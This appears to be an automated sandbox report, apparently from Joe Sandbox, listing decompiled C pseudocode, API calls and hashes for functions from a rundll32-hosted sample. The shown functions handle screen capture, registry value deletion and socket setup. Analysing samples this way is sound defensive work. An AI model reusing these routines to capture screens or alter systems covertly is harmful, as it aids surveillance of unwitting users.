                                                                                              0x04261045
                                                                                              0x0426104b
                                                                                              0x04261057
                                                                                              0x0426105c
                                                                                              0x04261060
                                                                                              0x04261068
                                                                                              0x0426106d
                                                                                              0x0426106f
                                                                                              0x04261075
                                                                                              0x0426108b
                                                                                              0x04261091
                                                                                              0x0426109c
                                                                                              0x0426109e
                                                                                              0x0426109f
                                                                                              0x0426109f
                                                                                              0x042610a8
                                                                                              0x042610ac
                                                                                              0x042610ae
                                                                                              0x042610b1
                                                                                              0x042610b3
                                                                                              0x042610b9
                                                                                              0x042610ba
                                                                                              0x042610c0
                                                                                              0x042610c8
                                                                                              0x042610cb
                                                                                              0x042610d0
                                                                                              0x042610d0
                                                                                              0x042610d5
                                                                                              0x00000000
                                                                                              0x042610dd
                                                                                              0x042610d5
                                                                                              0x042610e6

                                                                                              APIs
                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 0426104E
                                                                                              • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,00000102,?), ref: 04261083
                                                                                              • RegDeleteValueW.ADVAPI32(?,00000000), ref: 04261091
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0426109F
                                                                                              • LocalFree.KERNEL32(?,?,?,0000003F), ref: 042610C0
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Local$AllocCloseDeleteFreeOpenValue
                                                                                              • String ID:
                                                                                              • API String ID: 3540541088-0
                                                                                              • Opcode ID: c92814b6d2991281c83dc5d35464b6a891dd1ec0a91ddd9822ed5599c0c761cb
                                                                                              • Instruction ID: 1c6cebaebe7fedab5eddac6f46b7f0b29e1c00231feaad1a60a6e485ab4c1e18
                                                                                              • Opcode Fuzzy Hash: c92814b6d2991281c83dc5d35464b6a891dd1ec0a91ddd9822ed5599c0c761cb
                                                                                              • Instruction Fuzzy Hash: B6316FB5E10219ABDF10DFA4D844ABEBBB8FF44354F148129FD06A7240D735AA51CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 94%
                                                                                              			E042628C0(signed short __ecx, signed int _a4, signed int _a8, signed int _a12) {
                                                                                              				signed short _v8;
                                                                                              				void* __esi;
                                                                                              				signed int _t28;
                                                                                              				struct tagBITMAPINFO* _t30;
                                                                                              				signed int _t44;
                                                                                              				struct tagBITMAPINFO* _t51;
                                                                                              				signed int _t54;
                                                                                              				unsigned int _t58;
                                                                                              				signed int _t59;
                                                                                              				signed char* _t60;
                                                                                              				struct HDC__* _t64;
                                                                                              				signed short _t66;
                                                                                              				void* _t68;
                                                                                              				signed int _t69;
                                                                                              
                                                                                              				_t53 = __ecx;
                                                                                              				_push(__ecx);
                                                                                              				_t66 = _a4;
                                                                                              				_v8 = __ecx;
                                                                                              				_t72 = _t66 - 8;
                                                                                              				if(_t66 > 8) {
                                                                                              					_t28 = 0;
                                                                                              					__eflags = 0;
                                                                                              				} else {
                                                                                              					_t53 = _t66;
                                                                                              					_t28 = 1 << _t66;
                                                                                              				}
                                                                                              				_a4 = _t28;
                                                                                              				_push(0x28 + _t28 * 4);
                                                                                              				_t30 = E04275B55(_t53, _t66, _t72);
                                                                                              				_t54 = _a8;
                                                                                              				_t51 = _t30;
                                                                                              				_t59 = _a12;
                                                                                              				_t51->bmiHeader = 0x28;
                                                                                              				_t51->bmiHeader.biWidth = _t54;
                                                                                              				_t51->bmiHeader.biHeight = _t59;
                                                                                              				_t51->bmiHeader.biPlanes = 1;
                                                                                              				_t51->bmiHeader.biBitCount = _t66;
                                                                                              				_t51->bmiHeader.biCompression = 0;
                                                                                              				_t51->bmiHeader.biXPelsPerMeter = 0;
                                                                                              				_t51->bmiHeader.biYPelsPerMeter = 0;
                                                                                              				_t51->bmiHeader.biClrUsed = 0;
                                                                                              				_t51->bmiHeader.biClrImportant = 0;
                                                                                              				_t51->bmiHeader.biSizeImage = ((_t66 & 0x0000ffff) * _t54 + 0x0000001f >> 0x00000003 & 0xfffffffc) * _t59;
                                                                                              				if(_t66 < 0x10) {
                                                                                              					_t64 = GetDC(0);
                                                                                              					_t68 = CreateCompatibleBitmap(_t64, 1, 1);
                                                                                              					GetDIBits(_t64, _t68, 0, 0, 0, _t51, 0);
                                                                                              					ReleaseDC(0, _t64);
                                                                                              					DeleteObject(_t68);
                                                                                              					if( *((char*)(_v8 + 0xc)) != 0) {
                                                                                              						_t69 = _a4;
                                                                                              						if(_t69 > 0) {
                                                                                              							_t21 =  &(_t51->bmiColors[0]); // 0x29
                                                                                              							_t60 = _t21;
                                                                                              							do {
                                                                                              								_t44 =  *_t60 & 0x000000ff;
                                                                                              								_t60 =  &(_t60[4]);
                                                                                              								_t58 = _t44 * 0x259 + ( *(_t60 - 3) & 0x000000ff) * 0x132 + ( *(_t60 - 5) & 0x000000ff) * 0x75 >> 0xa;
                                                                                              								 *(_t60 - 5) = _t58;
                                                                                              								 *(_t60 - 4) = _t58;
                                                                                              								 *(_t60 - 3) = _t58;
                                                                                              								_t69 = _t69 - 1;
                                                                                              							} while (_t69 != 0);
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				return _t51;
                                                                                              			}

















                                                                                              0x042628c0
                                                                                              0x042628c3
                                                                                              0x042628c6
                                                                                              0x042628c9
                                                                                              0x042628d2
                                                                                              0x042628d5
                                                                                              0x042628df
                                                                                              0x042628df
                                                                                              0x042628d7
                                                                                              0x042628d9
                                                                                              0x042628db
                                                                                              0x042628db
                                                                                              0x042628e1
                                                                                              0x042628eb
                                                                                              0x042628ec
                                                                                              0x042628f1
                                                                                              0x042628f4
                                                                                              0x042628f6
                                                                                              0x04262902
                                                                                              0x04262908
                                                                                              0x0426290b
                                                                                              0x0426290e
                                                                                              0x04262915
                                                                                              0x0426291f
                                                                                              0x04262929
                                                                                              0x04262930
                                                                                              0x04262937
                                                                                              0x0426293e
                                                                                              0x04262945
                                                                                              0x0426294b
                                                                                              0x0426295b
                                                                                              0x0426296f
                                                                                              0x04262973
                                                                                              0x0426297c
                                                                                              0x04262983
                                                                                              0x04262990
                                                                                              0x04262992
                                                                                              0x04262997
                                                                                              0x04262999
                                                                                              0x04262999
                                                                                              0x042629a0
                                                                                              0x042629a0
                                                                                              0x042629a3
                                                                                              0x042629c1
                                                                                              0x042629c4
                                                                                              0x042629c7
                                                                                              0x042629ca
                                                                                              0x042629cd
                                                                                              0x042629cd
                                                                                              0x042629a0
                                                                                              0x04262997
                                                                                              0x04262990
                                                                                              0x042629da

                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 04262953
                                                                                              • CreateCompatibleBitmap.GDI32(00000000,00000001,00000001), ref: 04262960
                                                                                              • GetDIBits.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04262973
                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0426297C
                                                                                              • DeleteObject.GDI32(00000000), ref: 04262983
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: BitmapBitsCompatibleCreateDeleteObjectRelease
                                                                                              • String ID:
                                                                                              • API String ID: 3052192651-0
                                                                                              • Opcode ID: c168952a0cc6b860babee5fafa6857885d38b6f28a0d0e9d321c0168387908d6
                                                                                              • Instruction ID: 5ea143aad1aedb0809516e411b166910c32ef60ace507818f91f2634a7d16c87
                                                                                              • Opcode Fuzzy Hash: c168952a0cc6b860babee5fafa6857885d38b6f28a0d0e9d321c0168387908d6
                                                                                              • Instruction Fuzzy Hash: EA31B672605210AFEB049F18DC89B6AFFA4EF55315F058299E849CF2C2D778DE44CBA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 90%
                                                                                              			E04262A10(intOrPtr __ecx, int* _a4) {
                                                                                              				intOrPtr _v8;
                                                                                              				void* _v12;
                                                                                              				int _v16;
                                                                                              				intOrPtr* _t46;
                                                                                              				intOrPtr _t62;
                                                                                              				int _t72;
                                                                                              				intOrPtr _t73;
                                                                                              				void* _t81;
                                                                                              				int _t83;
                                                                                              				intOrPtr _t85;
                                                                                              
                                                                                              				_t46 = _a4;
                                                                                              				_v12 = 0;
                                                                                              				_t3 = _t46 + 8; // 0x8a0004c2
                                                                                              				_t4 = _t46 + 0xc; // 0x5e5fff45
                                                                                              				_t83 =  *_t3 -  *_t46;
                                                                                              				_t5 = _t46 + 4; // 0x5de58b5b
                                                                                              				_t72 =  *_t4 -  *_t5;
                                                                                              				 *(__ecx + 0x64)->bmiHeader.biWidth = _t83;
                                                                                              				_v8 = __ecx;
                                                                                              				_v16 = _t83;
                                                                                              				 *(__ecx + 0x64)->bmiHeader.biHeight = _t72;
                                                                                              				 *(__ecx + 0x64)->bmiHeader.biSizeImage = (( *(__ecx + 0x64)->bmiHeader.biBitCount & 0x0000ffff) *  *(__ecx + 0x64)->bmiHeader.biWidth + 0x0000001f >> 0x00000003 & 0xfffffffc) *  *(__ecx + 0x64)->bmiHeader.biHeight;
                                                                                              				_t81 = CreateDIBSection( *(__ecx + 0x3c),  *(__ecx + 0x64), 0,  &_v12, 0, 0);
                                                                                              				SelectObject( *(_v8 + 0x48), _t81);
                                                                                              				BitBlt( *(_v8 + 0x44),  *_a4, _a4[1], _t83, _t72,  *(_v8 + 0x3c),  *_a4, _a4[1],  *(_v8 + 0x10));
                                                                                              				_t62 = _v8;
                                                                                              				_t73 = _t62;
                                                                                              				BitBlt( *(_t73 + 0x48), 0, 0, _v16, _t72,  *(_t62 + 0x44),  *_a4, _a4[1], 0xcc0020);
                                                                                              				asm("movups xmm0, [edx]");
                                                                                              				asm("movups [eax], xmm0");
                                                                                              				 *((intOrPtr*)(_t73 + 0x18)) =  *((intOrPtr*)(_t73 + 0x18)) + 0x10;
                                                                                              				_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t73 + 0x64)) + 0x14));
                                                                                              				E0427E060( *((intOrPtr*)(_t73 + 0x14)) +  *((intOrPtr*)(_t73 + 0x18)), _v12, _t85);
                                                                                              				 *((intOrPtr*)(_t73 + 0x18)) =  *((intOrPtr*)(_t73 + 0x18)) + _t85;
                                                                                              				return DeleteObject(_t81);
                                                                                              			}













                                                                                              0x04262a16
                                                                                              0x04262a1d
                                                                                              0x04262a24
                                                                                              0x04262a27
                                                                                              0x04262a2a
                                                                                              0x04262a2c
                                                                                              0x04262a2c
                                                                                              0x04262a37
                                                                                              0x04262a3d
                                                                                              0x04262a40
                                                                                              0x04262a43
                                                                                              0x04262a5e
                                                                                              0x04262a73
                                                                                              0x04262a7c
                                                                                              0x04262aa2
                                                                                              0x04262ab1
                                                                                              0x04262abb
                                                                                              0x04262ac4
                                                                                              0x04262acf
                                                                                              0x04262ad2
                                                                                              0x04262ad8
                                                                                              0x04262adc
                                                                                              0x04262aea
                                                                                              0x04262af2
                                                                                              0x04262b02

                                                                                              APIs
                                                                                              • CreateDIBSection.GDI32(00000000,?,00000000,00000000,00000000,00000000), ref: 04262A6D
                                                                                              • SelectObject.GDI32(?,00000000), ref: 04262A7C
                                                                                              • BitBlt.GDI32(?,?,?,8A0004C2,5DE58B5B,?,?,?,?), ref: 04262AA2
                                                                                              • BitBlt.GDI32(?,00000000,00000000,?,5DE58B5B,?,00000000,?,00CC0020), ref: 04262AC4
                                                                                              • DeleteObject.GDI32(00000000), ref: 04262AF6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Object$CreateDeleteSectionSelect
                                                                                              • String ID:
                                                                                              • API String ID: 3188413882-0
                                                                                              • Opcode ID: ca1c45f64a6a16f3c5e81966fecd01d10dc25b217274f1fddcb370d820daf889
                                                                                              • Instruction ID: 401901cc1db72fb7d9931ff699b8e522935f1dd25058b34284a440a7f2373cf8
                                                                                              • Opcode Fuzzy Hash: ca1c45f64a6a16f3c5e81966fecd01d10dc25b217274f1fddcb370d820daf889
                                                                                              • Instruction Fuzzy Hash: 23315776A00204EFCB04DF88D985E9ABFB9FF49310F158195FA049B262D771EDA1DB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 46%
                                                                                              			E0426D2D0(signed short* __ecx, short* __edx, WCHAR* _a4, signed int* _a8, signed int _a12) {
                                                                                              				signed int _t14;
                                                                                              				signed int _t19;
                                                                                              				WCHAR* _t20;
                                                                                              				signed int _t31;
                                                                                              				signed int* _t35;
                                                                                              				WCHAR* _t38;
                                                                                              				void* _t39;
                                                                                              				signed int _t40;
                                                                                              
                                                                                              				 *__edx =  *__ecx;
                                                                                              				_t14 = __ecx[1] & 0x0000ffff;
                                                                                              				__imp__#15(_t14);
                                                                                              				_t38 = _a4;
                                                                                              				 *_a12 = _t14;
                                                                                              				_t16 =  !=  ? 0x1c : 0x10;
                                                                                              				__imp__WSAAddressToStringW(__ecx, 0x10, 0, _t38, _a8);
                                                                                              				_t45 =  !=  ? 0x1c : 0x10;
                                                                                              				if(( !=  ? 0x1c : 0x10) != 0) {
                                                                                              					return 0;
                                                                                              				} else {
                                                                                              					_t40 =  *__ecx & 0x0000ffff;
                                                                                              					_a12 = _t40;
                                                                                              					_t19 = __ecx[1] & 0x0000ffff;
                                                                                              					__imp__#15(_t19, _t39);
                                                                                              					_t31 = 0 | _t19 != 0x00000000;
                                                                                              					if(_t40 == 0x17) {
                                                                                              						if(_t31 == 0) {
                                                                                              							_t20 = StrChrW(_t38, 0x25);
                                                                                              							goto L7;
                                                                                              						} else {
                                                                                              							_t20 = StrPBrkW(_t38, L"]%");
                                                                                              						}
                                                                                              						goto L8;
                                                                                              					} else {
                                                                                              						if(_t31 == 0) {
                                                                                              							L10:
                                                                                              							_t35 = _a8;
                                                                                              						} else {
                                                                                              							_t20 = StrChrW(_t38, 0x3a);
                                                                                              							L7:
                                                                                              							L8:
                                                                                              							if(_t20 == 0) {
                                                                                              								goto L10;
                                                                                              							} else {
                                                                                              								 *_t20 = 0;
                                                                                              								_t35 = _a8;
                                                                                              								 *_t35 = _t20 - _t38 >> 1;
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              					if(_a12 != 0x17 || _t31 == 0) {
                                                                                              						 *_t35 =  *_t35 + 1;
                                                                                              						return 1;
                                                                                              					} else {
                                                                                              						E0427E060(_t38,  &(_t38[1]),  *_t35 +  *_t35);
                                                                                              						return 1;
                                                                                              					}
                                                                                              				}
                                                                                              			}











                                                                                              0x0426d2da
                                                                                              0x0426d2dd
                                                                                              0x0426d2e2
                                                                                              0x0426d2ee
                                                                                              0x0426d2f2
                                                                                              0x0426d305
                                                                                              0x0426d30a
                                                                                              0x0426d310
                                                                                              0x0426d312
                                                                                              0x0426d3aa
                                                                                              0x0426d318
                                                                                              0x0426d319
                                                                                              0x0426d31e
                                                                                              0x0426d321
                                                                                              0x0426d326
                                                                                              0x0426d331
                                                                                              0x0426d338
                                                                                              0x0426d344
                                                                                              0x0426d357
                                                                                              0x00000000
                                                                                              0x0426d346
                                                                                              0x0426d34c
                                                                                              0x0426d34c
                                                                                              0x00000000
                                                                                              0x0426d33a
                                                                                              0x0426d33c
                                                                                              0x0426d371
                                                                                              0x0426d371
                                                                                              0x0426d33e
                                                                                              0x0426d357
                                                                                              0x0426d356
                                                                                              0x0426d35d
                                                                                              0x0426d35f
                                                                                              0x00000000
                                                                                              0x0426d361
                                                                                              0x0426d363
                                                                                              0x0426d368
                                                                                              0x0426d36d
                                                                                              0x0426d36d
                                                                                              0x0426d35f
                                                                                              0x0426d33c
                                                                                              0x0426d379
                                                                                              0x0426d39a
                                                                                              0x0426d3a4
                                                                                              0x0426d37f
                                                                                              0x0426d389
                                                                                              0x0426d399
                                                                                              0x0426d399
                                                                                              0x0426d379

                                                                                              APIs
                                                                                              • htons.WS2_32(?), ref: 0426D2E2
                                                                                              • WSAAddressToStringW.WS2_32(?,00000010,00000000,?,?), ref: 0426D30A
                                                                                              • htons.WS2_32(?), ref: 0426D326
                                                                                              • StrPBrkW.SHLWAPI(?,0429F834,?,00000010,00000000,?,?), ref: 0426D34C
                                                                                              • StrChrW.SHLWAPI(?,00000025,?,00000010,00000000,?,?), ref: 0426D357
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: htons$AddressString
                                                                                              • String ID:
                                                                                              • API String ID: 2368566317-0
                                                                                              • Opcode ID: ff7a3f83ef962b79672ad98a10c152173ea3431e72fedebb68f189d545fe28f1
                                                                                              • Instruction ID: c2b03245842f39ca0977bc51b40e78bd4d978d2369b917e6eadce971aa38860b
                                                                                              • Opcode Fuzzy Hash: ff7a3f83ef962b79672ad98a10c152173ea3431e72fedebb68f189d545fe28f1
                                                                                              • Instruction Fuzzy Hash: 8221C936320205ABDB105F6DEC88A76B3ACFF59714F044065F906CA250E7B8EC91DB54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E04267A90(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                              				void* _v12;
                                                                                              				char _v16;
                                                                                              				intOrPtr _v20;
                                                                                              				char _v24;
                                                                                              				void* _t28;
                                                                                              				void* _t30;
                                                                                              				struct _SECURITY_ATTRIBUTES* _t33;
                                                                                              				intOrPtr* _t43;
                                                                                              				intOrPtr _t44;
                                                                                              				intOrPtr* _t45;
                                                                                              				intOrPtr _t46;
                                                                                              
                                                                                              				_t46 = _a4;
                                                                                              				_t45 = __ecx;
                                                                                              				 *__ecx = 0x429e8b0;
                                                                                              				 *((intOrPtr*)(__ecx + 4)) = _t46;
                                                                                              				 *((intOrPtr*)(_t46 + 0x38)) = __ecx;
                                                                                              				_t28 = CreateEventW(0, 1, 0, 0);
                                                                                              				_t42 = _t45 + 0x1c;
                                                                                              				 *(_t45 + 8) = _t28;
                                                                                              				 *_t45 = 0x429f17c;
                                                                                              				E04252330(_t45 + 0x1c);
                                                                                              				 *(_t45 + 0x10) = 0;
                                                                                              				 *(_t45 + 0x14) = 0;
                                                                                              				 *(_t45 + 0xe4) = 0;
                                                                                              				 *((char*)(_t45 + 0xec)) = 1;
                                                                                              				 *((intOrPtr*)(_t45 + 0xe8)) = 0x3f;
                                                                                              				 *(_t45 + 0xf0) = 0;
                                                                                              				 *(_t45 + 0xf4) = 0;
                                                                                              				_t30 = CreateEventW(0, 0, 0, 0);
                                                                                              				 *(_t45 + 0x18) = _t30;
                                                                                              				if(_t30 != 0) {
                                                                                              					 *(_t45 + 0xc) = 1;
                                                                                              					_v24 = E04268040;
                                                                                              					_v20 = _t45;
                                                                                              					_v16 = 1;
                                                                                              					_v12 = CreateEventW(0, 0, 0, 0);
                                                                                              					_t33 = E0427F897(_t42, 0, 0, E04265400,  &_v24, 0, 0);
                                                                                              					WaitForSingleObject(_v12, 0xffffffff);
                                                                                              					CloseHandle(_v12);
                                                                                              					 *(_t45 + 0xe4) = _t33;
                                                                                              					goto L6;
                                                                                              				} else {
                                                                                              					 *(_t45 + 0xc) = _t30;
                                                                                              					_t15 = _t46 + 0x20; // 0x0
                                                                                              					_t43 =  *_t15;
                                                                                              					 *(_t46 + 0x44) = 1;
                                                                                              					if(_t43 != 0) {
                                                                                              						L4:
                                                                                              						 *((intOrPtr*)( *_t43 + 4))();
                                                                                              						return _t45;
                                                                                              					} else {
                                                                                              						_t17 = _t46 + 0x24; // 0x0
                                                                                              						_t44 =  *_t17;
                                                                                              						if(_t44 == 0) {
                                                                                              							L6:
                                                                                              							return _t45;
                                                                                              						} else {
                                                                                              							_t43 = _t44 + 4;
                                                                                              							goto L4;
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              			}














                                                                                              0x04267a9e
                                                                                              0x04267aa4
                                                                                              0x04267aac
                                                                                              0x04267ab2
                                                                                              0x04267ab5
                                                                                              0x04267ab8
                                                                                              0x04267aba
                                                                                              0x04267abd
                                                                                              0x04267ac0
                                                                                              0x04267ac6
                                                                                              0x04267ad3
                                                                                              0x04267ada
                                                                                              0x04267ae1
                                                                                              0x04267aeb
                                                                                              0x04267af2
                                                                                              0x04267afc
                                                                                              0x04267b06
                                                                                              0x04267b10
                                                                                              0x04267b12
                                                                                              0x04267b17
                                                                                              0x04267b4c
                                                                                              0x04267b53
                                                                                              0x04267b5a
                                                                                              0x04267b5d
                                                                                              0x04267b67
                                                                                              0x04267b77
                                                                                              0x04267b86
                                                                                              0x04267b8f
                                                                                              0x04267b95
                                                                                              0x00000000
                                                                                              0x04267b19
                                                                                              0x04267b19
                                                                                              0x04267b1c
                                                                                              0x04267b1c
                                                                                              0x04267b1f
                                                                                              0x04267b28
                                                                                              0x04267b34
                                                                                              0x04267b36
                                                                                              0x04267b41
                                                                                              0x04267b2a
                                                                                              0x04267b2a
                                                                                              0x04267b2a
                                                                                              0x04267b2f
                                                                                              0x04267b9b
                                                                                              0x04267ba3
                                                                                              0x04267b31
                                                                                              0x04267b31
                                                                                              0x00000000
                                                                                              0x04267b31
                                                                                              0x04267b2f
                                                                                              0x04267b28

                                                                                              APIs
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,04259782,042A78D8,042A78D8,00000000), ref: 04267AB8
                                                                                                • Part of subcall function 04252330: CoInitialize.OLE32(00000000), ref: 0425239B
                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,04259782,042A78D8,042A78D8,00000000), ref: 04267B10
                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 04267B61
                                                                                              • WaitForSingleObject.KERNEL32(042A78D8,000000FF), ref: 04267B86
                                                                                              • CloseHandle.KERNEL32(042A78D8), ref: 04267B8F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateEvent$CloseHandleInitializeObjectSingleWait
                                                                                              • String ID:
                                                                                              • API String ID: 3162378676-0
                                                                                              • Opcode ID: 313ebd6edbd295b1a4c93694d304538524be430b2b09080912357584ef0c3969
                                                                                              • Instruction ID: 140dd4890340b4ea008a089d7f7b57c0db806e0c2d6e2f9644b0e5d3e5c889d6
                                                                                              • Opcode Fuzzy Hash: 313ebd6edbd295b1a4c93694d304538524be430b2b09080912357584ef0c3969
                                                                                              • Instruction Fuzzy Hash: 0F31AD71740302BBE710DF65DC45BAAFBA4FB44714F20425AEA19AB2C0D7B2B850CBD4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 19%
                                                                                              			E0426D490(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
                                                                                              				signed int _v8;
                                                                                              				char _v12;
                                                                                              				char _v16;
                                                                                              				signed int _t12;
                                                                                              				char* _t22;
                                                                                              				intOrPtr* _t42;
                                                                                              				intOrPtr* _t43;
                                                                                              				signed int _t44;
                                                                                              
                                                                                              				_t12 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t12 ^ _t44;
                                                                                              				_v16 = 1;
                                                                                              				_v12 = 0;
                                                                                              				_t29 = __ecx;
                                                                                              				if(__edx != 0) {
                                                                                              					if(__edx != 1) {
                                                                                              						if(__edx != 2) {
                                                                                              							SetLastError(0x57);
                                                                                              							return E04275AFE(_v8 ^ _t44);
                                                                                              						} else {
                                                                                              							_t42 = __imp__#21;
                                                                                              							 *_t42(__ecx, 0xffff, 0xfffffffb,  &_v12, 4);
                                                                                              							 *_t42(0xffff, 4,  &_v16, 4);
                                                                                              							return E04275AFE(_v8 ^ _t44, __ecx);
                                                                                              						}
                                                                                              					} else {
                                                                                              						_t22 =  &_v12;
                                                                                              						goto L4;
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t22 =  &_v16;
                                                                                              					L4:
                                                                                              					_t43 = __imp__#21;
                                                                                              					 *_t43(_t29, 0xffff, 0xfffffffb, _t22, 4);
                                                                                              					 *_t43(0xffff, 4,  &_v12, 4);
                                                                                              					return E04275AFE(_v8 ^ _t44, _t29);
                                                                                              				}
                                                                                              			}











                                                                                              0x0426d496
                                                                                              0x0426d49d
                                                                                              0x0426d4a0
                                                                                              0x0426d4a7
                                                                                              0x0426d4af
                                                                                              0x0426d4b5
                                                                                              0x0426d4bf
                                                                                              0x0426d4ff
                                                                                              0x0426d53e
                                                                                              0x0426d557
                                                                                              0x0426d501
                                                                                              0x0426d501
                                                                                              0x0426d515
                                                                                              0x0426d527
                                                                                              0x0426d53b
                                                                                              0x0426d53b
                                                                                              0x0426d4c1
                                                                                              0x0426d4c1
                                                                                              0x00000000
                                                                                              0x0426d4c1
                                                                                              0x0426d4b7
                                                                                              0x0426d4b7
                                                                                              0x0426d4c4
                                                                                              0x0426d4c4
                                                                                              0x0426d4d5
                                                                                              0x0426d4e7
                                                                                              0x0426d4fb
                                                                                              0x0426d4fb

                                                                                              APIs
                                                                                              • setsockopt.WS2_32(?,0000FFFF,000000FB,00000000,00000004), ref: 0426D4D5
                                                                                              • setsockopt.WS2_32(?,0000FFFF,00000004,00000000,00000004), ref: 0426D4E7
                                                                                              • setsockopt.WS2_32(?,0000FFFF,000000FB,00000000,00000004), ref: 0426D515
                                                                                              • setsockopt.WS2_32(?,0000FFFF,00000004,00000001,00000004), ref: 0426D527
                                                                                              • SetLastError.KERNEL32(00000057), ref: 0426D53E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: setsockopt$ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 1564866530-0
                                                                                              • Opcode ID: 885588b17dd107154e37a6157dc4e290d20b54c24e924fceab68a88c1a37d9f2
                                                                                              • Instruction ID: 61a9e417618b7b9afe113a783f80c1cc34853cd164d3453693e999f4758645eb
                                                                                              • Opcode Fuzzy Hash: 885588b17dd107154e37a6157dc4e290d20b54c24e924fceab68a88c1a37d9f2
                                                                                              • Instruction Fuzzy Hash: 5B21EE76B1410D76DB10DA98AC81FBEB76CDF85335F100276EB05A75C0DD75AD448750
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 57%
                                                                                              			E042611E0(void* __ebx, intOrPtr __ecx, void* _a4, void* _a8) {
                                                                                              				intOrPtr* _v8;
                                                                                              				long _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				void* _v20;
                                                                                              				intOrPtr* _v24;
                                                                                              				char _v28;
                                                                                              				char _t29;
                                                                                              				void* _t32;
                                                                                              				long _t33;
                                                                                              				void* _t45;
                                                                                              				void* _t46;
                                                                                              				char* _t49;
                                                                                              				intOrPtr* _t53;
                                                                                              				short* _t55;
                                                                                              				void* _t56;
                                                                                              				int _t57;
                                                                                              
                                                                                              				_t45 = __ebx;
                                                                                              				_t56 = _a8;
                                                                                              				_t53 = _a4 + 1;
                                                                                              				_v16 = __ecx;
                                                                                              				_v24 = _t53;
                                                                                              				_v20 = 0;
                                                                                              				_t29 = _t56 - 1 + _t53;
                                                                                              				_v28 = _t29;
                                                                                              				if(_t29 - _t53 >= 4) {
                                                                                              					_a8 =  *_t53;
                                                                                              					_v24 = _t53 + 4;
                                                                                              				} else {
                                                                                              					_v20 = 1;
                                                                                              					_a8 = 0;
                                                                                              				}
                                                                                              				_t49 =  &_v28;
                                                                                              				_t32 = E04260D20(_t49);
                                                                                              				_t55 = _t32;
                                                                                              				if(_v20 == 0) {
                                                                                              					_push(_t45);
                                                                                              					_t33 = _t56 + 4;
                                                                                              					_v12 = _t33;
                                                                                              					_t46 = LocalAlloc(0x40, _t33);
                                                                                              					E0427E060(_t46, _a4, _t56);
                                                                                              					_v8 = _t46 + _t56;
                                                                                              					_t57 = 0;
                                                                                              					_a4 = 0;
